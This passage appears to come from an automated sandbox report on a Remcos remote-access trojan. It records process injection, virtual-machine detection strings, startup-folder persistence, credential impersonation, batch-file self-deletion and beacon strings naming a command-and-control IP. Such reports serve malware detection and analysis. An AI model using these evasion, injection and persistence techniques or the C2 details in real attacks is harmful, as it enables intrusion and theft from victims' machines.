@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_00403F4D
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0041178F ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041178F
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040C800 GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040C800
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,5_2_004045FD
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: file.exe, file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: file.exe, 00000000.00000002.2142430073.00000000006E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: @HARDWARE\ACPI\DSDT\VBOX__PROCMON_WINDOW_CLASSPROCEXPL21invalid vector<T> subscript?datafmt WAVERIFF.wav%Y-%m-%d %H.%MFreeFrameGetFrameCloseCameraOpenCamera|dmc|[DataStart]%02i:%02i:%02i:%03i [INFO] KeepAlive Enabled! Timeout: %i seconds
                    Source: file.exe, 00000000.00000003.2126925157.0000000000737000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2142430073.000000000073E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2142430073.00000000006E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: SGS.exe, 00000005.00000002.2199326644.00000000006E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                    Source: SGS.exe, 0000000C.00000002.2351272008.0000000000628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                    Source: SGS.exe, 0000000C.00000002.2351272008.0000000000628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
                    Source: SGS.exe, 0000000C.00000002.2351272008.0000000000628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yF
                    Source: file.exe, 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                    Source: file.exe, 00000009.00000003.2304232651.00000000008C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: SGS.exe, 00000005.00000002.2199326644.00000000006E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yJ
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeAPI call chain: ExitProcess graph end nodegraph_5-8621
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeAPI call chain: ExitProcess graph end nodegraph_5-8476
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,5_2_00410065
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0040F984 mov eax, dword ptr fs:[00000030h]5_2_0040F984
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_004011A3 mov eax, dword ptr fs:[00000030h]11_2_004011A3
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_004105D6 SetUnhandledExceptionFilter,RevertToSelf,5_2_004105D6

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Contains functionality to inject code into remote processes
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040EDE9 __EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,11_2_0040EDE9
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeMemory written: C:\Users\user\AppData\Local\Temp\SGS.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeMemory written: C:\Users\user\AppData\Local\Temp\SGS.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,GetModuleHandleA,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,Sleep,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, \svchost.exe11_2_00409B4E
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0041032D lstrcmpiA,LogonUserA,lstrlen,LCMapStringA,LogonUserA,LogonUserA,74701B10,ImpersonateLoggedOnUser,RevertToSelf,746F5030,CloseHandle,5_2_0041032D
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe "C:\Users\user\AppData\Local\Temp\SGS.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Users\user\AppData\Local\Temp\SGS.exe C:\Users\user\AppData\Local\Temp\SGS.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5249171.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" "Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_004044D2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_004044D2
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1 (64 bit)|cmd||cmd|8589148160S
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KRemoteHost|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|-|GB|cmd|WiM
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|bit)|cmd||cmd|8589148160!
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exet|cmd|6109
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\#
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Managert|cmd|C:\Users\alfo
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KRemoteHost|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|122|cmd|1791967422|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|-
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd||6109e
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|148160
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd||cmd|GB|cmd|Windows 10 Enterpr
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|e|cmd||cmd||cmd|8589148160
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3i [INFO]
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|-
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageranager
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageri [INFO]r
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|t|cmd|6109
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Mise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|122|cmd|1791967422|cmd|1|cmd|154.16.63.197|cmd|Remcos-XVE2ON|cmd|0|cmd|C:\Users\user\Desktop\file.exe|cmd|Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz|cmd|-Host|cmd|610930/alfo
                    Source: logs.dat.3.drBinary or memory string: [ Program Manager ]
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageri [INFO] J#!
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|104|cmd|-1866312411|cmd|1|cmd|154.16.63.197|8589148160
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1d|GB|cmd|Wiu
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3i [INFO] #
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager3i [INFO] r
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerfonsr
                    Source: file.exe, 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Most|cmd|610930/user|cmd|GB|cmd|Windows 10 Enterprise (64 bit)|cmd||cmd|8589148160|cmd|2.0.4 Pro|cmd|C:\Users\user\AppData\Roaming\remcos\logs.dat|cmd|C:\Users\user\Desktop\file.exe|cmd||cmd|Program Manager|cmd|1|cmd|109G
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00411005 cpuid 11_2_00411005
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,5_2_004045FD
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,11_2_004093B5
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040FC69 __EH_prolog,GdiplusStartup,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,CreateDirectoryW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,Sleep,GetLocalTime,swprintf,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@